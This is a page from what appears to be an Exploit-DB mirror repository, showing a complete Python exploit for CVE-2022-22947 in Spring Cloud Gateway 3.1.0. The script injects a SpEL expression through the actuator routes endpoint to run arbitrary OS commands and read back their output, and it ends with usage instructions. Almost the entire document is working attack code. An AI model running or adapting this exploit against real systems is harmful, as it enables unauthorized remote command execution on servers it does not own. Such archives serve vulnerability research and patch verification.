bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/java/webapps/50799.py
Offensive Security e8863e001f DB: 2022-03-08 
9 changes to exploits/shellcodes

Private Internet Access 3.3 - 'pia-service' Unquoted Service Path
Cloudflare WARP 1.4 - Unquoted Service Path
Malwarebytes 4.5 - Unquoted Service Path
Foxit PDF Reader 11.0 - Unquoted Service Path
Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)
part-db 0.5.11 - Remote Code Execution (RCE)
Attendance and Payroll System v1.0 - Remote Code Execution (RCE)
Attendance and Payroll System v1.0 - SQLi Authentication Bypass
Hasura GraphQL 2.2.0 - Information Disclosure
2022-03-08 05:01:37 +00:00

87 lines
No EOL
3.4 KiB
Python
Executable file
Raw Permalink Blame History

# Exploit Title: Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 03/03/2022
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://spring.io/
# Software Link: https://spring.io/projects/spring-cloud-gateway
# Version: This vulnerability affect Spring Cloud Gateway < 3.0.7 & < 3.1.1
# Tested on: 3.1.0
# CVE : CVE-2022-22947
import random
import string
import requests
import json
import sys
import urllib.parse
import base64
headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'}
proxies = {
'http': 'http://172.29.32.1:8081',
'https': 'http://172.29.32.1:8081',
}
id = ''.join(random.choice(string.ascii_lowercase) for i in range(8))
def exploit(url, command):
payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"}
commandb64 =base64.b64encode(command.encode('utf-8')).decode('utf-8')
rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), proxies=proxies, verify=False)
if(rbase.status_code == 201):
print("[+] Stage deployed to /actuator/gateway/routes/"+id)
print("[+] Executing command...")
r = requests.post(url + '/actuator/gateway/refresh', headers=headers, proxies=proxies, verify=False)
if(r.status_code == 200):
print("[+] getting result...")
r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)
if(r.status_code == 200):
get_response = r.json()
clean(url, id)
return get_response['filters'][0].split("'")[1]
else:
print("[-] Error: Invalid response")
clean(url, id)
exit(1)
else:
clean(url, id)
print("[-] Error executing command")
def clean(url, id):
remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)
if(remove.status_code == 200):
print("[+] Stage removed!")
else:
print("[-] Error: Fail to remove stage")
def banner():
print("""
###################################################
# #
# Exploit for CVE-2022-22947 #
# - Carlos Vieira (Crowsec) #
# #
# Usage: #
# python3 exploit.py <url> <command> #
# #
# Example: #
# python3 exploit.py http://localhost:8080 'id' #
# #
###################################################
""")
def main():
banner()
if len(sys.argv) != 3:
print("[-] Error: Invalid arguments")
print("[-] Usage: python3 exploit.py <url> <command>")
exit(1)
else:
url = sys.argv[1]
command = sys.argv[2]
print(exploit(url, command))
if __name__ == '__main__':
main()
Reference in a new issue View git blame Copy permalink